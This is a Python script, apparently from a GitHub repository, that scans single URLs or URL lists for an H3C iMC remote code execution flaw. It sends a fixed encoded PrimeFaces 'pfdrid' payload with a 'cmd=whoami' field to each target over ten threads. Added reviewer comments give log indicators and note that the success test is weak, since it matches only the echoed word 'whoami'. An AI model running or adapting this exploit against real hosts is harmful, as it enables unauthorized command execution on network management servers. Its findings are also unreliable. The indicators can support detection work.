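"""HCM-IMC-rce: checker for the H3C iMC (Intelligent Management Center) remote code execution vulnerability.

Repository layout: README.md, rce.py.
Screenshot: https://github.com/user-attachments/assets/9d1cf401-0b92-4a15-bba4-0f53fe6c86e1

Options:
    -u  check a single URL
    -f  check a batch of URLs read from a file
    -o  export the results to a file
"""
import requests
import argparse
from concurrent.futures import ThreadPoolExecutor, as_completed


def banner():
    """Print the ASCII-art banner and the welcome line to stdout."""
    banner_text = """
_ _ _____ _____ ________ ________
| | | ||____ / __ \\ |_ _| \\/ / __ \\
| |_| | / / / \\/_____| | | . . | / \\/
| _ | \\ \\ | |______| | | |\\/| | |
| | | |.___/ / \\__/\\ _| |_| | | | \\__/\\
\\_| |_\\____/ \\____/ \\___/\\_| |_|\\____/
    """
    print(banner_text)
    print("Welcome to the H3C-IMC RCE vulnerability detection tool. Author: Alex")


def check_rce(url):
    """POST the fixed probe form to *url* and return a one-line verdict string.

    The function never raises for network problems: timeouts and other
    ``requests`` errors are turned into "[*] ..." result lines so that a batch
    run keeps going.

    Args:
        url: Full URL (scheme included) of the endpoint to probe.

    Returns:
        A line starting with "[+]", "[-]" or "[*]".
    """
    # Static, dated browser User-Agent: every probe from this tool carries the
    # same value, which makes it a usable indicator when reviewing proxy or
    # web-server logs.
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Connection': 'close'
    }

    # Form fields of the probe. pfdrt / ln / pfdrid look like PrimeFaces
    # dynamic-resource parameters; seen together with a cmd field in a POST
    # body they form a distinctive pattern to alert on in WAF or request-body
    # logs. This is an active check: the form asks for `whoami`, it is not a
    # passive version fingerprint.
    payload = {
        'pfdrt': 'sc',
        'ln': 'primefaces',
        'pfdrid': 'uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D',
        'cmd': 'whoami'
    }

    try:
        response = requests.post(url, headers=headers, data=payload, timeout=10)
    except requests.exceptions.Timeout:
        return f"[*] Timeout while connecting to {url}"
    except requests.exceptions.RequestException as e:
        return f"[*] Could not connect to {url}: {e}"

    # NOTE(review): this matches the literal request value "whoami", not the
    # text a host would print for that command, so a page that merely reflects
    # the parameter is reported as vulnerable. Neither "[+]" nor "[-]" is proof;
    # confirm findings against the vendor advisory and the installed patch level.
    if response.status_code == 200 and "whoami" in response.text:
        return f"[+] {url} has RCE vulnerability"
    return f"[-] No RCE vulnerability detected on {url}"


def check_urls(urls):
    """Run ``check_rce`` over *urls* with a pool of 10 worker threads.

    Args:
        urls: Iterable of URL strings.

    Returns:
        List of result lines in completion order (not input order). An
        unexpected exception from a worker is recorded as a "[*] Error ..."
        line instead of aborting the batch.
    """
    results = []
    with ThreadPoolExecutor(max_workers=10) as executor:  # Adjust max_workers for your needs
        future_to_url = {executor.submit(check_rce, url): url for url in urls}
        for future in as_completed(future_to_url):
            url = future_to_url[future]
            try:
                results.append(future.result())
            except Exception as e:
                results.append(f"[*] Error checking {url}: {e}")
    return results


def main():
    """Parse the command line, run the single or batch check, and report results.

    Results are always printed; with ``-o`` they are also written to the given
    file, one per line.
    """
    banner()

    parser = argparse.ArgumentParser(description="RCE Vulnerability Checker")
    parser.add_argument('-u', '--url', type=str, help='Check a single URL')
    parser.add_argument('-f', '--file', type=str, help='File containing list of URLs')
    parser.add_argument('-o', '--output', type=str, help='Output file to save results')

    args = parser.parse_args()

    # Without a target the original fell through and exited silently, which
    # reads like a clean run; fail with the usage text instead.
    if not args.url and not args.file:
        parser.error("one of -u/--url or -f/--file is required")

    results = []

    if args.url:
        results.append(check_rce(args.url))
    elif args.file:
        try:
            with open(args.file, 'r') as file:
                # Blank lines are skipped; surrounding whitespace is stripped.
                urls = [line.strip() for line in file if line.strip()]
            results.extend(check_urls(urls))
        except FileNotFoundError:
            print(f"[ERROR] File not found: {args.file}")
            return

    if args.output:
        # Result lines can carry arbitrary exception text from the HTTP layer;
        # an explicit encoding keeps the write from failing on a narrow locale.
        with open(args.output, 'w', encoding='utf-8') as output_file:
            for result in results:
                output_file.write(result + '\n')
                print(result)  # Print to console as well
        print(f"[INFO] Results saved to {args.output}")
    else:
        for result in results:
            print(result)


if __name__ == "__main__":
    main()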